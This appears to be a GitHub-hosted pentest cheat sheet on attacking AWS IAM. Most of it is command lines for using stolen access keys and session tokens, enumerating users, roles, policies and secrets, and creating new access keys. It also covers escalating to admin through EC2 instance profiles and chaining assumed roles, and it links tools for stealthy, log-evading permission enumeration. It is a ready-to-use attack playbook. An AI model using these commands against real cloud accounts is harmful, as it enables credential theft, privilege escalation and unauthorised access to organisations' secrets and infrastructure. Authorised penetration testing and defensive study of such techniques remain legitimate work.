~/.aws/credentials

[default] aws_access_key_id = XXX aws_secret_access_key = XXXX

export AWS_ACCESS_KEY_ID= export AWS_SECRET_ACCESS_KEY= export AWS_DEFAULT_REGION=

Check valid

aws sts get-caller-identity aws sdb list-domains --region us-east-1

If we can steal AWS credentials, add to your configuration

aws configure --profile stolen

Open ~/.aws/credentials

Under the [stolen] section add aws_session_token and add the discovered token value here

aws sts get-caller-identity --profile stolen

Get account id

aws sts get-access-key-info --access-key-id=ASIA1234567890123456

aws iam get-account-password-policy aws sts get-session-token aws iam list-users aws iam list-roles aws iam list-access-keys --user-name aws iam create-access-key --user-name aws iam list-attached-user-policies --user-name XXXX aws iam get-policy aws iam get-policy-version

aws deploy list-applications

aws directconnect describe-connections

aws secretsmanager get-secret-value --secret-id --profile

aws sns publish --topic-arn arn:aws:sns:us-east-1:account id:aaa --message aaa

IAM Prefix meaning

ABIA - AWS STS service bearer token ACCA - Context-specific credential AGPA - Group AIDA - IAM user AIPA - Amazon EC2 instance profile AKIA - Access key ANPA - Managed policy ANVA - Version in a managed policy APKA - Public key AROA - Role ASCA - Certificate ASIA - Temporary (AWS STS) access key IDs use this prefix, but are unique only in combination with the secret access key and the session token.

TOOLS

https://github.com/andresriancho/enumerate-iam

python enumerate-iam.py --access-key XXXXXXXXXXXXX --secret-key XXXXXXXXXXX python enumerate-iam.py --access-key "ACCESSKEY" --secret-key "SECRETKEY" (--session-token "$AWS_SESSION_TOKEN")

https://github.com/RhinoSecurityLabs/Security-Research/blob/master/tools/aws-pentest-tools/aws_escalate.py

python aws_escalate.py

https://github.com/andresriancho/nimbostratus

python2 nimbostratus dump-permissions

https://github.com/nccgroup/ScoutSuite

python3 scout.py aws

https://github.com/salesforce/cloudsplaining

cloudsplaining download cloudsplaining scan

Enumerate IAM permissions without logging (stealth mode)

https://github.com/Frichetten/aws_stealth_perm_enum

Unauthenticated (only account id) Enumeration of IAM Users and Roles

https://github.com/Frichetten/enumate_iam_using_bucket_policy

AWS Consoler

https://github.com/NetSPI/aws_consoler

Generate link to console from valid credentials

aws_consoler -a ASIAXXXX -s SECRETXXXX -t TOKENXXXX

AWSRoleJuggler

https://github.com/hotnops/AWSRoleJuggler/

You can use one assumed role to assume another one

./find_circular_trust.py python aws_role_juggler.py -r arn:aws:iam::123456789:role/BuildRole arn:aws:iam::123456789:role/GitRole arn:aws:iam::123456789:role/ArtiRole

https://github.com/prisma-cloud/IAMFinder

python3 iamfinder.py init python3 iamfinder.py enum_user --aws_id 123456789012

https://github.com/nccgroup/PMapper

Check IAM permissions

IAM CLI ENUMERATION

First of all, set your profile

aws configure --profile test set profile=test # Just for convenience

Get policies available

aws --profile "$profile" iam list-policies | jq -r ".Policies[].Arn"

Get specific policy version

aws --profile "$profile" iam get-policy --policy-arn "$i" --query "Policy.DefaultVersionId" --output text

Get all juicy info oneliner (search for Action/Resource /)

profile="test"; for i in $(aws --profile "$profile" iam list-policies | jq -r '.Policies[].Arn'); do echo "Describing policy $i" && aws --profile "$profile" iam get-policy-version --policy-arn "$i" --version-id $(aws --profile "$profile" iam get-policy --policy-arn "$i" --query 'Policy.DefaultVersionId' --output text); done | tee /tmp/policies.log

#List Managed User policies aws --profile "test" iam list-attached-user-policies --user-name "test-user" #List Managed Group policies aws --profile "test" iam list-attached-group-policies --group-name "test-group" #List Managed Role policies aws --profile "test" iam list-attached-role-policies --role-name "test-role"

#List Inline User policies aws --profile "test" iam list-user-policies --user-name "test-user" #List Inline Group policies aws --profile "test" iam list-group-policies --group-name "test-group" #List Inline Role policies aws --profile "test" iam list-role-policies --role-name "test-role"

#Describe Inline User policies aws --profile "test" iam get-user-policy --user-name "test-user" --policy-name "test-policy" #Describe Inline Group policies aws --profile "test" iam get-group-policy --group-name "test-group" --policy-name "test-policy" #Describe Inline Role policies aws --profile "test" iam get-role-policy --role-name "test-role" --policy-name "test-policy"

List roles policies

aws --profile "test" iam get-role --role-name "test-role"

Assume role from any ec2 instance (get Admin)

Create instance profile

aws iam create-instance-profile --instance-profile-name YourNewRole-Instance-Profile

Associate role to Instance Profile

aws iam add-role-to-instance-profile --role-name YourNewRole --instance-profile-name YourNewRole-Instance-Profile

Associate Instance Profile with instance you want to use

aws ec2 associate-iam-instance-profile --instance-id YourInstanceId --iam-instance-profile Name=YourNewRole-Instance-Profile

Get assumed roles in instance

aws --profile test sts get-caller-identity

Shadow admin

aws iam list-attached-user-policies --user-name {} aws iam get-policy-version --policy-arn provide_policy_arn --version-id $(aws iam get-policy --policy-arn provide_policy_arn --query 'Policy.DefaultVersionId' --output text) aws iam list-user-policies --user-name {} aws iam get-user-policy --policy-name policy_name_from_above_command --user-name {} | python -m json.tool

Vulnerables policies:

iam:CreatUser iam:CreateLoginProfile iam:UpdateProfile iam:AddUserToGroup

Files

cloud-aws-IAM.md

Latest commit

History